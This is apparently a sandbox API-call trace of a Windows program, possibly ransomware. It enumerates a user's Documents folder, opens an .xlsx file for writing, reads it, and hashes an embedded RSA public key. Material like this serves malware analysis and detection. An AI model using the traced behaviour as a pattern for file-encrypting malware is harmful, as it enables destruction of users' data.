FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\8NNLi0kOEoM-mpUM785\\ySw9UDFA\\*" (normalized: "c:\\users\\keecfmwgj\\documents\\8nnli0koeom-mpum785\\ysw9udfa\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9bc8f80, ftCreationTime.dwHighDateTime=0x1d899ea, ftLastAccessTime.dwLowDateTime=0xa94857a0, ftLastAccessTime.dwHighDateTime=0x1d89e5c, ftLastWriteTime.dwLowDateTime=0xa94857a0, ftLastWriteTime.dwHighDateTime=0x1d89e5c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0197.196] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.196] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9bc8f80, ftCreationTime.dwHighDateTime=0x1d899ea, ftLastAccessTime.dwLowDateTime=0xa94857a0, ftLastAccessTime.dwHighDateTime=0x1d89e5c, ftLastWriteTime.dwLowDateTime=0xa94857a0, ftLastWriteTime.dwHighDateTime=0x1d89e5c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0197.196] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34892980, ftCreationTime.dwHighDateTime=0x1d897c7, ftLastAccessTime.dwLowDateTime=0xa193b880, ftLastAccessTime.dwHighDateTime=0x1d89d10, ftLastWriteTime.dwLowDateTime=0xa193b880, ftLastWriteTime.dwHighDateTime=0x1d89d10, nFileSizeHigh=0x0, nFileSizeLow=0xa3f2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="83P1PAX.xlsx", cAlternateFileName="83P1PA~1.XLS")) returned 1 [0197.196] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.196] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xbe) returned 0x2a245f0 [0197.196] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.196] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\8NNLi0kOEoM-mpUM785\\ySw9UDFA\\83P1PAX.xlsx") returned=".xlsx" [0197.196] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\8NNLi0kOEoM-mpUM785\\ySw9UDFA\\83P1PAX.xlsx" (normalized: "c:\\users\\keecfmwgj\\documents\\8nnli0koeom-mpum785\\ysw9udfa\\83p1pax.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0197.197] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=41970) returned 1 [0197.197] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0197.200] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xa3cc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0197.200] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0197.202] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0197.203] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0197.203] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0197.203] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0xa3f2, lpOverlapped=0x0) returned 1 [0197.203] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0197.203] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0197.204] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0197.204] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0197.204] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b970) returned 1 [0197.205] CryptCreateHash (in: hProv=0x31b970, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0197.205] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0197.205] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0197.205] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0197.205] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0197.205] GetLastError () returned 0x0 [0197.205] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0197.205] CryptReleaseContext (hProv=0x31b970, dwFlags=0x0) returned 1 [0197.205] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0197.205] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0197.205] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0197.205] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0197.205] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0197.205] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0197.205] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0197.206] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa3f0) returned 0x2af5168 [0197.206] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0197.206] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0197.206] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0197.206] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0197.206] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2af3f88 [0197.206] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0197.206] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2aea650 [0197.207] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae66f8 [0197.207] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2aea698 [0197.207] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6710 [0197.207] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6740 [0197.207] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae67a0 [0197.207] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6758 [0197.207] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0197.207] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0197.207] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aedfa0 [0197.207] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af4180 [0197.207] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6740 | out: hHeap=0x2c0000) returned 1 [0197.207] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6758 | out: hHeap=0x2c0000) returned 1 [0197.207] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae67a0 | out: hHeap=0x2c0000) returned 1 [0197.208] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0197.208] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4180 | out: hHeap=0x2c0000) returned 1 [0197.208] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae67a0 [0197.208] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e30 [0197.208] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6758 [0197.208] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0197.208] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae6740 [0197.208] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e50 [0197.208] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0197.208] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0197.209] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0197.209] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0197.209] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0197.209] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ac8 [0197.209] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0197.209] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0197.209] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6758 | out: hHeap=0x2c0000) returned 1 [0197.209] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0197.209] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6740 | out: hHeap=0x2c0000) returned 1 [0197.209] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0197.209] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0197.210] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae67a0 | out: hHeap=0x2c0000) returned 1 [0197.210] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0197.210] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0197.211] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aedfa0 | out: hHeap=0x2c0000) returned 1 [0197.211] GetCurrentThreadId () returned 0x5d8 [0197.211] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0197.211] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2af2660 [0197.211] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42548 [0197.211] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.211] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0197.211] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0197.211] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0197.211] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0197.211] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0197.211] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0197.211] GetCurrentThreadId () returned 0x5d8 [0197.211] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0197.212] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0197.212] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0197.212] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0197.212] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0197.212] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0197.212] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0197.213] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0197.213] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0197.213] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0197.213] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40528 [0197.213] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0197.213] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0197.213] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0197.213] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae67a0 [0197.213] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0197.213] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0197.213] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0197.213] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0197.213] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0197.213] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0197.213] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0197.213] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0197.213] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6740 [0197.214] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0197.214] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0197.214] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0197.214] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0197.214] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0197.214] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0197.214] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0197.214] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6758 [0197.214] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0197.214] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0197.214] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0197.214] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6728 [0197.214] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0197.214] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae67b8 [0197.214] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0197.214] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7da0 [0197.214] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0197.214] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6788 [0197.215] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0197.215] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6770 [0197.215] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0197.215] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae67d0 [0197.215] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6770 | out: hHeap=0x2c0000) returned 1 [0197.215] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6770 [0197.215] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6788 | out: hHeap=0x2c0000) returned 1 [0197.215] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0197.215] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0197.215] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0197.215] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0197.215] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7a40 [0197.215] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6740 | out: hHeap=0x2c0000) returned 1 [0197.215] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6740 [0197.215] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0197.215] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af4180 [0197.215] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae67a0 | out: hHeap=0x2c0000) returned 1 [0197.215] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0197.216] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae67d0 | out: hHeap=0x2c0000) returned 1 [0197.216] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af4390 [0197.216] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0197.216] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0197.216] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0197.216] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0197.216] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6740 | out: hHeap=0x2c0000) returned 1 [0197.216] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af45a8 [0197.216] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0197.217] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0197.217] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0197.218] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.218] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0197.218] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0197.219] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0197.219] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0197.219] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4390 | out: hHeap=0x2c0000) returned 1 [0197.220] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af45a8 | out: hHeap=0x2c0000) returned 1 [0197.220] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0197.220] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0197.220] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6770 | out: hHeap=0x2c0000) returned 1 [0197.220] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0197.220] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae67b8 | out: hHeap=0x2c0000) returned 1 [0197.220] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0197.220] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6758 | out: hHeap=0x2c0000) returned 1 [0197.221] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6728 | out: hHeap=0x2c0000) returned 1 [0197.221] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0197.221] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0197.222] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0197.222] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6710 | out: hHeap=0x2c0000) returned 1 [0197.222] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aea698 | out: hHeap=0x2c0000) returned 1 [0197.223] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4180 | out: hHeap=0x2c0000) returned 1 [0197.223] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0197.223] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0197.224] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0197.224] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0197.224] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0197.224] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0197.224] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0197.224] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0197.225] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0197.225] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0197.225] 